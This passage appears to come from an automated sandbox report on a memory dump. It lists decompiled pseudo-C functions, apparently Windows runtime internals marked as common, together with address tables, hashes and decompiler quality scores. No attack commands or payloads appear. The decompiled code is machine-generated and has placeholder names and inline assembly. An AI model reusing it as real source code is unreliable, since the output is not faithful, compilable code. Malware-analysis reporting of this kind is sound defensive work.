				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E053E2280(_t12, 0x54b8608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E054000C2(0x54b8608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}

0x053fb395
0x053fb3a2
0x053fb3a5
0x053fb3aa
0x053fb3b2
0x053fb3ba
0x053fb3bd
0x053fb3c0
0x053fb3c4
0x053fb3c9
0x0543a3e9
0x0543a3ed
0x0543a3f0
0x0543a3ff
0x0543a403
0x0543a409
0x00000000
0x00000000
0x0543a40b
0x0543a40b
0x0543a40f
0x0543a415
0x0543a423
0x0543a423
0x0543a415
0x053fb3d1
0x053fb3e8
0x053fb3e8
0x053fb3d9

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f67b75716715e4ca3125f7d13ccb8f540e458bb63dcbb2315f013789c332c26
Instruction ID: 027789cc6f307f8aaca8eb806ec769e64e6d327490f6737d179ed64a9fa95894
Opcode Fuzzy Hash: 9f67b75716715e4ca3125f7d13ccb8f540e458bb63dcbb2315f013789c332c26
Instruction Fuzzy Hash: 351148733451109BCB18CA65DD81AABB3ABEBC9370B24012BDE16C7790DE71AC02C790

Uniqueness

Uniqueness Score: -1.00%

Function 053C9240, Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E053C9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x549f708);
				E0541D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E054095D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E054095D0();
				_t33 =  *0x54b84c4; // 0x0
				L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x54b84c4; // 0x0
				L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x54b84c4; // 0x0
				E053E2280(L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x54b86b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E054095D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E054095D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E053C9325();
					_t50 =  *0x54b84c4; // 0x0
					return E0541D0D1(L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}

0x053c9240
0x053c9242
0x053c9247
0x053c924c
0x053c924e
0x053c9255
0x053c9257
0x053c925a
0x053c925f
0x053c925f
0x053c9266
0x053c9271
0x053c9276
0x053c9279
0x053c927e
0x053c9295
0x053c929a
0x053c92b1
0x053c92b6
0x053c92d7
0x053c92dc
0x053c92e0
0x053c92e6
0x053c92e8
0x053c92ee
0x053c9332
0x053c9333
0x053c9337
0x053c9338
0x053c933a
0x053c933a
0x053c933d
0x053c9342
0x053c9342
0x053c9345
0x053c9349
0x053c934e
0x053c9352
0x053c9357
0x053c92f4
0x053c92f4
0x053c92f6
0x053c92f9
0x053c9300
0x053c9306
0x053c9324
0x053c9324

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c059d0797ec86dcd3b13f69b436e124d4f9f0e5e53d403f71163d36f357a4dc1
Instruction ID: d78d42db694984260217f1fc9311fa4c4c082bfa652df8f90ac721c24ced8ebc
Opcode Fuzzy Hash: c059d0797ec86dcd3b13f69b436e124d4f9f0e5e53d403f71163d36f357a4dc1
Instruction Fuzzy Hash: 03219D32251A00DFC725EF68CA04FA5BBF9FF08704F1545ADE00A976A2DB34E942DB44

Uniqueness

Uniqueness Score: -1.00%

Function 05454257, Relevance: .1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E05454257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x54a08d0);
				E0541D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E054541E8(__ebx, __edi, __ecx, _t39);
				E053DEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x54b87e4;
					_t18 =  *0x54b87e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x54b5cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x54b87e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x54b87e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L053C7055(_t31 + 0xfffffff8);
								_t24 =  *0x54b87e0; // 0x0
								_t18 = _t24 - 1;
								 *0x54b87e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x54b5cd0;
				if( *0x54b5cd0 <= 0) {
					L053C7055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x54b87e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x54b87e8 = _t30;
						 *0x54b87e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E0541D0D1(L05454320());
			}

0x05454257
0x05454257
0x05454257
0x05454259
0x0545425e
0x05454263
0x05454265
0x05454273
0x05454278
0x0545427c
0x0545427f
0x05454281
0x05454287
0x054542d7
0x054542d7
0x054542da
0x0545428d
0x0545428d
0x0545428f
0x05454292
0x05454297
0x0545429c
0x054542a0
0x054542a6
0x054542a8
0x054542ae
0x054542b3
0x00000000
0x054542ba
0x054542ba
0x054542bf
0x054542c5
0x054542ca
0x054542cf
0x054542d0
0x00000000
0x054542d0
0x054542b3
0x00000000
0x054542a6
0x0545429c
0x054542dc
0x054542dc
0x054542e3
0x05454309
0x054542e5
0x054542e5
0x054542e8
0x054542ee
0x054542f0
0x00000000
0x054542f2
0x054542f2
0x054542f4
0x054542f7
0x054542f9
0x05454300
0x05454300
0x054542f0
0x0545430e
0x0545431f

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f76c17fd0d13d5e638dbae588566c92837631323a7c4de2309433a0755e533fc
Instruction ID: cead0117d6e7e21b80e1e8e97c1ca0a4aa688829d411cd396053f0464f6982a5
Opcode Fuzzy Hash: f76c17fd0d13d5e638dbae588566c92837631323a7c4de2309433a0755e533fc
Instruction Fuzzy Hash: A1219D70611600DFDB19DF64D404AE5BFFAFB453A9BA086AFE5099F392DB309482CB40

Uniqueness

Uniqueness Score: -1.00%

Function 054446A7, Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E054446A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L053E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E0540F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E053FD268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L053E77F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}

0x054446b7
0x054446ba
0x054446c5
0x054446c8
0x054446d0
0x054446d4
0x054446e6
0x054446e9
0x054446f4
0x054446ff
0x05444705
0x05444706
0x0544470c
0x05444713
0x0544471b
0x05444723
0x05444725
0x054446d6
0x054446d9
0x054446db
0x054446db
0x05444732

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction ID: b03c4fd0fa5e38bffd73dcdf6e06ce5549e164f97fc72cce93aa49171ba61514
Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction Fuzzy Hash: 3811E572604208BBCB159F5DD8809BEF7B9EF95310F1080AEF944C7350DA358D55D7A4

Uniqueness

Uniqueness Score: -1.00%

Function 053F2397, Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E053F2397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x54b848c != 0) {
					L053EFAD0(0x54b8610);
					if( *0x54b848c == 0) {
						E053EFA00(0x54b8610, _t19, _t27, 0x54b8610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E053F2581(0x54b8610, 0x53a50a0, _t26, _t27, _t28);
						E053EFA00(0x54b8610, 0x53a50a0, _t27, 0x54b8610);
					}
				} else {
					L1:
					_t11 =  *0x54b8614; // 0x0
					if(_t11 == 0) {
						_t11 = E05404886(0x53a1088, 1, 0x54b8614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E053F2581(0x54b8610, (_t11 << 4) + 0x53a5070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}

0x053f23b0
0x053f23b6
0x053f2409
0x053f2415
0x05435ae9
0x00000000
0x053f241b
0x053f241b
0x053f241d
0x053f2427
0x053f242e
0x053f2430
0x053f2430
0x053f23b8
0x053f23b8
0x053f23b8
0x053f23bf
0x053f23fc
0x053f23fc
0x053f23c1
0x053f23c3
0x053f23d0
0x053f23d8
0x053f23d8
0x053f23dc
0x053f23de
0x053f23e1
0x053f23e1
0x053f23ec

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc3fb37b350fcccc4d98978acbbab0de865e6ae279535a9636cf9e072870747f
Instruction ID: ab67f5597771933c7907c738437b04b87344d210aa25acd4adc9a9ade50b3362
Opcode Fuzzy Hash: bc3fb37b350fcccc4d98978acbbab0de865e6ae279535a9636cf9e072870747f
Instruction Fuzzy Hash: AC112676704310E7EB20E6699C85B97B6DEFB90620F54442BFB069B290DAF4E804C754

Uniqueness

Uniqueness Score: -1.00%

Function 054037F5, Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E054037F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E053E2280(_t6, 0x54b8550);
				}
				_t29 = E0540387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E053DFFB0(0x54b8550, _t27, 0x54b8550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}

0x054037fa
0x054037fc
0x05403805
0x05403808
0x05403808
0x05403814
0x05403818
0x05403846
0x05403848
0x0540384b
0x0540384b
0x05403852
0x00000000
0x05403854
0x05403856
0x00000000
0x00000000
0x05403863
0x00000000
0x05403863
0x0540381a
0x0540381a
0x0540381f
0x0540386e
0x0540386e
0x05403871
0x05403873
0x05403873
0x05403868
0x00000000
0x05403868
0x05403821
0x05403826
0x00000000
0x00000000
0x05403828
0x0540382a
0x05403841
0x00000000
0x05403841

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b1f56fec9cce2806f524e05881d8acca3f06c91faa048649db1bb3d1bcb4acc
Instruction ID: 1bce0be28a190b82bb4eae100d7e367419a832e979deeb2bcca0b77769f2e8fe
Opcode Fuzzy Hash: 6b1f56fec9cce2806f524e05881d8acca3f06c91faa048649db1bb3d1bcb4acc
Instruction Fuzzy Hash: 5B01C873A055105BC3278F1A9544EB7BFE7EF85A5072558FBE8458B391D730C801C790

Uniqueness

Uniqueness Score: -1.00%

Function 053CC962, Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E053CC962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t19;
				char _t22;
				void* _t26;
				void* _t27;
				char _t32;
				char _t34;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x54bd360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E053DEEF0(0x54b70a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E0544F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E053DEB70(_t29, 0x54b70a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E0540B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E0544F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x54b70c0; // 0x0
					while(_t38 != 0x54b70c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x54bb1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}

0x053cc96a
0x053cc974
0x053cc988
0x053cc98a
0x05437c9d
0x05437c9f
0x05437ca4
0x05437cae
0x05437cf0
0x05437cf5
0x05437cfa
0x053cc992
0x053cc996
0x053cc997
0x053cc998
0x053cc9a3
0x053cc9a3
0x05437cb0
0x05437cb7
0x05437cbb
0x00000000
0x00000000
0x05437cbd
0x05437ce8
0x05437cc5
0x05437cc8
0x05437cca
0x05437cd0
0x05437cd6
0x05437cde
0x05437ce4
0x05437ce4
0x05437cd0
0x00000000
0x05437ce8
0x053cc990
0x00000000

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c13015b60bfe37ad628439f2d317850c7f95a3f8535562d980147f7cd2ef383e
Instruction ID: 9aea808d1deb86ae5f4a7494f38a7d7442d53fa04bc6f22b2ecb5461e82be584
Opcode Fuzzy Hash: c13015b60bfe37ad628439f2d317850c7f95a3f8535562d980147f7cd2ef383e
Instruction Fuzzy Hash: 891106323006069BD710AE28DC469EBBBF6FB88110B10052BF88587660DF20ED05D7D1

Uniqueness

Uniqueness Score: -1.00%

Function 053F002D, Relevance: .1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E053F002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E053E7D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E053E7D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E053E7D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E053E7D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}

0x053f0032
0x053f0037
0x053f0043
0x05434b3a
0x053f0049
0x053f0049
0x053f0049
0x053f004e
0x053f0053
0x05434b48
0x05434b5a
0x05434b4a
0x05434b53
0x05434b53
0x05434b5f
0x00000000
0x05434b61
0x00000000
0x05434b61
0x053f0059
0x053f0059
0x053f0060
0x05434b6f
0x05434b6f
0x053f0069
0x05434b83
0x00000000
0x00000000
0x05434b90
0x05434b9b
0x05434b9b
0x05434ba4
0x00000000
0x00000000
0x05434baa
0x00000000
0x053f006f
0x053f006f
0x00000000
0x053f006f
0x053f0069

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction ID: d6cb76d418b92840fd681c94cfd079703bdf58544801bb4d9152cdbb3f571024
Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction Fuzzy Hash: 7F11CE326056C2CFDB228728C94DBB637DAFB44794F0900E1DE0687BA2E32AC841C760

Uniqueness

Uniqueness Score: -1.00%

Function 053D766D, Relevance: .1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E053D766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E053FF3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E053FF3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L053E4620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}

0x053d7672
0x053d767f
0x053d7689
0x053d76de
0x053d76de
0x053d768b
0x053d7691
0x053d7693
0x053d7697
0x00000000
0x053d7699
0x053d76a8
0x00000000
0x053d76aa
0x053d76ad
0x053d76b1
0x00000000
0x053d76b3
0x053d76b3
0x053d76b5
0x053d76ba
0x053d76bc
0x053d76bc
0x053d76c0
0x00000000
0x053d76c2
0x053d76ce
0x053d76ce
0x053d76c0
0x053d76b1
0x053d76a8
0x053d7697
0x053d76d9

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction ID: 817c356461ab6f491bb7c3e7a27ef1b98096b85b5e06fbc41483724728cc8c3a
Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction Fuzzy Hash: 5A018F33710119ABC721DE6EEC45F9BB7BDEB84A60B240529BD09EB254EA71DD0187B0

Uniqueness

Uniqueness Score: -1.00%

Function 0545C450, Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0545C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E05409910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E054095B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E054095D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E054095D0();
				return L053E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}

0x0545c458
0x0545c45d
0x0545c466
0x0545c468
0x0545c469
0x0545c46a
0x0545c46b
0x0545c46e
0x0545c46f
0x0545c471
0x0545c476
0x0545c476
0x0545c47c
0x0545c47e
0x0545c480
0x0545c480
0x0545c483
0x0545c484
0x0545c486
0x0545c488
0x0545c48f
0x0545c491
0x0545c493
0x0545c493
0x0545c48f
0x0545c498
0x0545c49e
0x0545c4ad
0x0545c4ad
0x0545c4b2
0x0545c4b4
0x0545c4cd

Memory Dump Source

Source File: 00000005.00000002.276140729.00000000053A0000.00000040.00000001.sdmp, Offset: 053A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction ID: 4c31b40d15dc684f54ec64d3658a301ce7ea96e091a89a7e80b9fde9635e9a8a
Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction Fuzzy Hash: F7019272240605BFD726AF66CC84EA3F76DFF553A0F10452AF514536A1CB31ACA1DAA0

Uniqueness

Uniqueness Score: -1.00%

Function 053C9080, Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E053C9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x54b85ec;
				E053E2280(_t48, 0x54b85ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E053DFFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x54b538c; // 0x77f06848
					if( *_t84 != 0x54b5388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x549f6e8);
						E0541D0E8(0x54b85ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E054988F5(_t80, _t85, 0x54b5388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x54b86c0; // 0x51007b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x54b86b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E053E2280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E054988F5(0x54b85ec, _t85, 0x54b5388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E0540AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
